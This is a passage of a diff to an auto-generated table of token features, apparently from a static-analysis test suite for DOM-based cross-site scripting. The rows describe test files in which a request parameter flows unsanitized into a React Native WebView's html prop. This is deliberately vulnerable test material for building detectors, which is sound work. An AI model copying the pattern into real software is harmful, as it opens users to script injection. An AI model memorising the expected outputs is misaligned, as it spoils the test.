| req | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:6:32:6:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:6:32:6:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:6:32:6:34 | req | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:6:32:6:34 | req | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:6:37:6:39 | res | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:6:37:6:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:6:37:6:39 | res | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:6:37:6:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:6:37:6:39 | res | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:13 | tainted | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:13 | tainted | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:13 | tainted | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:13 | tainted | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:13 | tainted | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:33 | tainted | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:33 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:33 | tainted | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:33 | tainted | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:33 | tainted | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:33 | tainted ... "code") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:33 | tainted ... "code") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:33 | tainted ... "code") | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:33 | tainted ... "code") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:7:7:7:33 | tainted ... "code") | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:19 | req | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:19 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:19 | req | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:19 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:19 | req | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:25 | req.param | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:25 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:25 | req.param | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:25 | req.param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:25 | req.param | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:33 | exceptional return of req.param("code") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:33 | exceptional return of req.param("code") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:33 | exceptional return of req.param("code") | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:33 | exceptional return of req.param("code") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:33 | exceptional return of req.param("code") | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:33 | req.param("code") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:33 | req.param("code") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:33 | req.param("code") | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:33 | req.param("code") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:7:17:7:33 | req.param("code") | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:7:21:7:25 | param | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:7:21:7:25 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:7:21:7:25 | param | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:7:21:7:25 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:7:21:7:25 | param | fileImports | express react-native | | autogenerated/Xss/DomBasedXss/react-native.js:7:27:7:32 | "code" | CalleeFlexibleAccessPath | req.param | | autogenerated/Xss/DomBasedXss/react-native.js:7:27:7:32 | "code" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-native.js:7:27:7:32 | "code" | contextFunctionInterfaces | | @@ -14584,18 +105758,334 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-native.js:7:27:7:32 | "code" | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/DomBasedXss/react-native.js:7:27:7:32 | "code" | fileImports | express react-native | | autogenerated/Xss/DomBasedXss/react-native.js:7:27:7:32 | "code" | receiverName | req | +| autogenerated/Xss/DomBasedXss/react-native.js:8:3:8:27 | | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:8:3:8:27 | | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:8:3:8:27 | | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:8:3:8:27 | | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:8:3:8:27 | | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:8:4:8:10 | WebView | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:8:4:8:10 | WebView | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:8:4:8:10 | WebView | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:8:4:8:10 | WebView | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:8:4:8:10 | WebView | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:15 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:15 | html | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:15 | html | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:15 | html | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:15 | html | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:25 | html={tainted} | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:25 | html={tainted} | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:25 | html={tainted} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:25 | html={tainted} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:25 | html={tainted} | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:25 | html={tainted} | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:25 | html={tainted} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:25 | html={tainted} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:25 | html={tainted} | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:8:12:8:25 | html={tainted} | fileImports | express react-native | | autogenerated/Xss/DomBasedXss/react-native.js:8:18:8:24 | tainted | assignedToPropName | html | | autogenerated/Xss/DomBasedXss/react-native.js:8:18:8:24 | tainted | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/react-native.js:8:18:8:24 | tainted | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/DomBasedXss/react-native.js:8:18:8:24 | tainted | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | | autogenerated/Xss/DomBasedXss/react-native.js:8:18:8:24 | tainted | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/DomBasedXss/react-native.js:8:18:8:24 | tainted | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:9:3:9:37 | | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:3:9:37 | | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:9:3:9:37 | | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:9:3:9:37 | | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:9:3:9:37 | | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:9:4:9:10 | WebView | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:4:9:10 | WebView | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:9:4:9:10 | WebView | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:9:4:9:10 | WebView | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:9:4:9:10 | WebView | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:17 | source | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:17 | source | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:17 | source | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:17 | source | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:17 | source | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:35 | source= ... inted}} | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:35 | source= ... inted}} | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:35 | source= ... inted}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:35 | source= ... inted}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:35 | source= ... inted}} | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:35 | source= ... inted}} | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:35 | source= ... inted}} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:35 | source= ... inted}} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:35 | source= ... inted}} | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:9:12:9:35 | source= ... inted}} | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:9:20:9:34 | {html: tainted} | assignedToPropName | source | +| autogenerated/Xss/DomBasedXss/react-native.js:9:20:9:34 | {html: tainted} | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:20:9:34 | {html: tainted} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:9:20:9:34 | {html: tainted} | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:9:20:9:34 | {html: tainted} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:9:20:9:34 | {html: tainted} | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:24 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:24 | html | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:24 | html | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:24 | html | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:24 | html | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:33 | html: tainted | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:33 | html: tainted | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:33 | html: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:33 | html: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:33 | html: tainted | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:33 | html: tainted | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:33 | html: tainted | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:33 | html: tainted | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:33 | html: tainted | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-native.js:9:21:9:33 | html: tainted | fileImports | express react-native | | autogenerated/Xss/DomBasedXss/react-native.js:9:27:9:33 | tainted | assignedToPropName | html | | autogenerated/Xss/DomBasedXss/react-native.js:9:27:9:33 | tainted | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/react-native.js:9:27:9:33 | tainted | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/DomBasedXss/react-native.js:9:27:9:33 | tainted | enclosingFunctionBody | req res tainted req param code WebView html tainted WebView source html tainted | | autogenerated/Xss/DomBasedXss/react-native.js:9:27:9:33 | tainted | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/DomBasedXss/react-native.js:9:27:9:33 | tainted | fileImports | express react-native | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:1:1:0 | this | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:1:1:0 | this | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:1:1:1 | MyContext | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:1:1:1 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:1:1:1 | MyContext | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:1:1:51 | import ... ntext'; | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:1:1:51 | import ... ntext'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:1:1:51 | import ... ntext'; | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:10:1:18 | MyContext | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:27:1:50 | './reac ... ontext' | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:27:1:50 | './reac ... ontext' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:1:27:1:50 | './reac ... ontext' | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:3:7 | MyContext | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:3:7 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:3:7 | MyContext | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:3:7 | MyContext | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:3:7 | MyContext | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:3:7 | this | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:3:7 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:3:7 | this | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:3:7 | this | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:3:7 | this | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | 'arguments' object of function renderMain | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | 'arguments' object of function renderMain | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | 'arguments' object of function renderMain | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | 'arguments' object of function renderMain | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | 'arguments' object of function renderMain | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | exceptional return of function renderMain | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | exceptional return of function renderMain | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | exceptional return of function renderMain | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | exceptional return of function renderMain | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | exceptional return of function renderMain | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | functio ... ider>\\n} | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | functio ... ider>\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | functio ... ider>\\n} | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | return of function renderMain | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | return of function renderMain | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | return of function renderMain | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | return of function renderMain | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:8:5:1 | return of function renderMain | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:17:3:26 | renderMain | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:17:3:26 | renderMain | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:3:17:3:26 | renderMain | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:12:4:82 | | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:12:4:82 | | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:12:4:82 | | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:12:4:82 | | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:12:4:82 | | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:13:4:21 | MyContext | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:13:4:21 | MyContext | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:13:4:21 | MyContext | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:13:4:21 | MyContext | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:13:4:21 | MyContext | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:13:4:30 | MyContext.Provider | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:13:4:30 | MyContext.Provider | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:13:4:30 | MyContext.Provider | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:13:4:30 | MyContext.Provider | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:13:4:30 | MyContext.Provider | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:23:4:30 | Provider | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:23:4:30 | Provider | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:23:4:30 | Provider | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:23:4:30 | Provider | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:23:4:30 | Provider | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:36 | value | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:36 | value | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:36 | value | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:36 | value | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:36 | value | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:60 | value={ ... .body}} | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:60 | value={ ... .body}} | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:60 | value={ ... .body}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:60 | value={ ... .body}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:60 | value={ ... .body}} | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:60 | value={ ... .body}} | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:60 | value={ ... .body}} | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:60 | value={ ... .body}} | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:60 | value={ ... .body}} | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:32:4:60 | value={ ... .body}} | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:39:4:59 | {root: ... t.body} | assignedToPropName | value | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:39:4:59 | {root: ... t.body} | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:39:4:59 | {root: ... t.body} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:39:4:59 | {root: ... t.body} | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:39:4:59 | {root: ... t.body} | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:39:4:59 | {root: ... t.body} | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:43 | root | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:43 | root | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:43 | root | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:43 | root | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:43 | root | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:58 | root: document.body | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:58 | root: document.body | contextFunctionInterfaces | renderMain() | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:58 | root: document.body | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:58 | root: document.body | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:58 | root: document.body | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:58 | root: document.body | enclosingFunctionBody | MyContext Provider value root document body | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:58 | root: document.body | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:58 | root: document.body | enclosingFunctionName | renderMain | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:58 | root: document.body | fileImports | ./react-create-context | +| autogenerated/Xss/DomBasedXss/react-provide-context.js:4:40:4:58 | root: document.body | fileImports | 